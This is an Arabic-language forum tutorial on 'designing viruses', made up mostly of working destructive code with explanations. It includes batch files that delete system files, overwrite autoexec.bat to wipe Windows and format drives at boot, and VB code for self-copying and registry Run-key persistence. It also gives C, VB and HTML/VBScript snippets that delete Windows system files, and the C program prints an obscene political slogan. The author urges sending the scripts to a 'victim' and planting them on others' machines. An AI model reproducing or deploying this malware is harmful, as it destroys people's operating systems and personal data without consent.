[rtl]السلام عليكم ورحمه الله وبركاته [/rtl]
[rtl]شرح لأقوى طرق تصميم فيروس [/rtl]
[rtl]بسم الله الرحمن الرحيم
[/rtl]
[rtl]هذا الموضوع من أقوى المواضيع التي تجذب القراء و الراغبين في تعلم الهكر و تجذب أكثر محبي البرمجة الذين يسعون إلي تعلم كل جديد في مجال البرمجة
و نظرا لأني واحد من محبي البرمجة أحببت أن ابحث في النت لتعلم طرق صناعة الفيروسات و الحمد لله وجدت بعض من المعلومات التي أفادتني و دلتني إلى الطريق الذي أنا أريده لذا أردت أن أعلم كل من يريد ذلك و كل من يرغب فى تصميم فيروس
قبل البدء في تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمة و هي التعريف بالفيروس و أنواعه و شروطه و التي سوف أوضحها الآن [/rtl]
[rtl]نبدأ الموضوع[/rtl]
[rtl]
تعريف الفيروس : يمكن تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا او اعتمادا على احد برامج ويندوز دون علم المستخدم بذلك و هناك فيروسات تشغل نفسها بناء على وقت الساعة في لويندوز أو تاريخ اليوم و أشهر هذه الفيروسات هو تشير نوبل الذي يعمل في يوم السادس و العشرين من كل شهر و لقد سمى الفيروس بهذا الاسم نسبة إلى الفيروسات الموجودة في جسم الإنسان و التي تصيبه و تتكاثر بسرعة فيه و هي نفس فكرة عمل الفيروس الذي يصيب الكومبيوتر [/rtl]
[rtl]و يجب توافر عدة شروط لكي يصبح الفيروس ذو فاعلية و هي : [/rtl]
[rtl]
- أن يكون ذا حجم صغير لكي لا يتم الانتباه إليه [/rtl]
[rtl]
- أن يعتمد على نفسه في التشغيل أو على البرامج الأساسية أو عن طريق الارتباط بأحد الملفات [/rtl]
[rtl]
- أن يكون ذا هدف و مغزى[/rtl]
[rtl]
- الآن و بعد أن فهمنا بعض المصطلحات الأساسية و التي يجب أن نكون على دراية فلنبدأ في التصميم [/rtl]
[rtl]ولكن قبل البدء يجب أن أوضح شيء خطير جدا جدا جدا[/rtl]
[rtl]
(( إذا كنت مبتدئ أو ممن يخشون التعامل مع الفيروسات فأرجو أن تقوم بفهم الموضوع دون أي محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى أن أي خطا في أي كود سوف يؤدى إلى إضرار كبيرة منها تدمير نظام التشغيل لذا أرجو الحزر من تصميم الفيروس وأنا لست مسؤل عن أي ضرر قد ينشئ لك من الفيروسات التي سوف تقوم بها )) [/rtl]
[rtl]الآن يجب أن نعرف ما هي الطرق التي سوف استخدمها في صناعة الفيروسات
لقد تعرفت أثناء بحثي عبر الانترنت على مجموعة من الطرق لتصميم الفيروسات و هي :[/rtl]
[rtl]- عن طريق الـnotepad
- عن طريق برنامج الفجول بيسك (vb)
- عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون )
و سوف أقوم الآن بعرض كل منهم على حدة و سوف أشرحهم لكم بالتفصيل أتمنى أن ينال إعجابكم ما سوف أقوم به [/rtl]
[rtl]الموقع لا يتحمل ما يحدث لجهازك عند تحميلك احد البرامج المدرجة من قبل عضو [/rtl]
[rtl]هذا هو الجزء الأول من صناعة الفيروسات و الذي سوف نقوم فيه على تعلم تصميم الفيروس بواسطة Notepad [/rtl]
[rtl]
للعمل على تصميم فيروس بهذا النوع من التصميمات يجب أن تعرف كيف تضع الأكواد التي سوف أعطيها لك و هي عن طريق فتح برنامج Notepad وكتابة الكود فيه ثم حفظه بأي اسم تريده ولكن بامتداد .bat
[/rtl]
[rtl]و الآن بعد أن تعرفت على المكان كل ما عليك أن تضع الكود المناسب لك في الNotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك إلا إذا أرسلته إلى الضحية التي تريد إنهائها أو يمكنك تجربة هذا الفيروس على جهاز التجارب إذا كان لديك [/rtl]
[rtl]
قبل أن أضع لكم الأكواد أريد أن أوضح أن هذه الأكواد منقولة طبعا ولكني وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرة عمله و طريقة تعديله مع مثال بسيط عليه
من الأفضل نسخ الكود و لصقه في المكان الذي تريده .[/rtl]
[rtl]
نبدأ بالكود الأول :
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الـتوضـــــــــــيح : [/rtl]
[rtl] بعد أن قمت بوضع الكود و حفظه بامتداد .bat فأنت هكذا تكون قد قمت بعمل فيروس و سوف تلحظ أن شكل الأيقونة قد تغير إلى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الآن جاهز للعمل و إياك أن تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال Sys من السيستم. وهذا ما سوف نلحظه بالنظر إلى الكود السابق و به سوف نجد انه كتب في هذا الكود أمر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.Sys " و هو أنى قد أعطيت له بان يمسح كل الملفات التي لها الامتدادين السابقين و يمكن ملاحظة شيء آخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد في أول الكود الأمر الخاص بذلك فسوف تجد انه قد أعطي له الأمر بالذهاب إلى c: و كما أعطاه الأمر بالذهاب إلى مالفات لويندوز عندما صدرنا له الأمر windir ثم أخبرناه أن الأوامر التالية يجب أن تكون داخل مل سيستيم و الذي هو موجود ضمن ملفات لويندوز
بعد ان فهمنا هذا الكود ما رايكم هل هناك من يستطيع إجابتي على سؤالي و هو هل يمكننا تعديل هذا الكود ؟!! [/rtl]
[rtl]
لن أدعكم تفكرون في الإجابة فانا سوف أجيبكم بكل بساطة و هي يمكننا أن نغير أي شيء قد فهمناه جيدا لذا نحن يمكننا أن نغير هذا الكود قليلا وسو أخبركم عما هو يمكننا أن نغيره و طبعا نتم تعرفون المكان الذي يمكننا أن نغيره في الكود فيمكننا أن نغير نوعية الملفات التي سوف يقوم بمسحها أو يمكننا زيادتها كما يمكننا أن نغير المكان الذي سوف يوجد فيه فمثلا هناك من يضع نوعين من أنظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا أن نغير اتجاه الفيروس إلى d:
مثال توضيحي : [/rtl]
[rtl]
أنا الآن أريد أن امزح مع احد و في نفس الوقت أريد أن أعلمه درس و تحذير فيمكنني أن اصنع فيروس يقوم بمسح جميع ملفات الصور التي امتدادها *.JPG. كما أنني أريد أن امسح جميع ملفات الأغاني التي امتدادها *.mp3 و جميع امتدادات الملفات الخاصة بالأفلام و التي امتدادها *.asf و التي توجد في E: كل ما علينا هو تعديل الكود ليصبح كالأتي :
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
ما رأيكم في الفيروس الجديد أتمنى أن ينال إعجابكم .
الكود الثانى :
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
[/rtl]
[rtl]الـتوضـــــــــــتيح : [/rtl]
[rtl]
الفيروس السابق يعتبر من الأفكار الجيدة للذين هم من محبين البرمجة وفاهمين في فكرة عمل الكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عن نفسه خبير كمبيوتر
نبدأ بتوضيح الكود : فكما نرى في الكود أول سطر مجرد فائدته مسح الشاشة من أي أمر أو تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعد سوف نجد مجموعة من السطور هي تقريبا مكرره فكرتها وليس مكرر عملها ولكن يمكننا أن نوضح انه هناك 3 أكواد منفصلة هم الفكرة الأساسية و هما ما سوف نحن نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطى هذا الكود الأمر للكمبيوتر بمسح الفولدر program files والذي يوجد فيه جميع البرامج التي تنزل على الجهاز و نلاحظ تكراره فى مسح لويندوز في الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولكنه إذا قام بمسح لويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك أعطي أمر نسخ لهذين الأمرين حتى يمكننا استخدامهم فيما بعد و هذا هو ما أعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
إما بعد ذلك فهو أعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود في السطر التالي :
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
أولا يوجد بعض الأمور توضيحها قبل البدء فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه في هذا partion أما إذا كنت تسوى هكر على جهاز ما فقم بتحميل هذا الفيروس إلى الـC: عنده ثم دعه يتمتع بذلك بعد أن يفتح جهازه
ولكني وجدت فيه عيب بسيط و هو أن هذا الفيروس لن يعمل في جهاز وضع فيه لويندوز داخل فولدر غير Windows فمثلا إذا كان هناك ضحية يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذي كوناه لن يقوم ببعض الأعمال و هي نسخ الأوامر و مسح لويندوز ولكنه سوف يقوم بعمل فورمات
أما بالنسبة لتعديله فكل ما استطيع أن أعطيكم إياه من تعديل مفيد فيه و هو أنكم تمسحوا أوامر مسح لويندوز و Program files و تدع أمر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود[/rtl]
[rtl] كما يلي :
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
[/rtl]
[rtl]الكود الثالث :
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
[/rtl]
[rtl]يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
[/rtl]
[rtl]الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده [/rtl]
[rtl]الخاصــــــــــــــية الأولى : [/rtl]
[rtl]
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحية إيقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا إذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التي تأتى معه [/rtl]
[rtl]الخاصــــــــــــــية الثانيه : [/rtl]
[rtl]
Option Explicit[/rtl]
[rtl] [/rtl]
[rtl]Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long[/rtl]
[rtl] [/rtl]
[rtl]
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\windows\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry : [/rtl]
[rtl]
هذا هو كل ما أنا حصلت عليه من أكواد للفيروسات فلقد شرحت لكم مجموعه من أكواد الفيروسات التي يمكننا من استخدامها و مجموعه من الأكواد التي بإضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شيء فإن حصلت على أي كود أخر فسوف أعطيه لكم في هذا الموضوع و سوف اشرح فيه كل ما أنا استطيع لذا انتظروا منى المفيد و يتبقى لي شيء بسيط وأنهي هذا الجزء و هو مجموعة أكواد لأشهر الفيروسات[/rtl]
[rtl]
Virus C++ :
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\tFuck -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat");
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
Virus Visual Basic :
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"
Virus Html :
<html>
<head>
<**** **********="*******-Type"
*******="****/html; charset=iso-8859-1">
<title>Active** HTML</title>
</head>
THIS HTML USING ACTIVE** PLEASE CLICK #YES#
<body bgcolor="#000000" ****="#C0C0C0">
<****** ********="VB******">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("******ing.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("******ing.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</******>
<!--- This ****** author is THEONE---!>
</body>
</html>
ملاحظة يحفظ هذا الفيروس بامتداد html .*
يمكنك من دراسة هذه الأكواد و النظر فيها إلى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم
هذا هو كل ما املك في هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير فانتظروا مني الجديد بخصوص الموضوع .
[/rtl]
[rtl]النهايــــــــــــــــــــــــــــــــــة .[/rtl]
لا تستخدموها ضد إخوانكم المسلمون
أرجوا وضع رد على الموضوع
[rtl] [/rtl]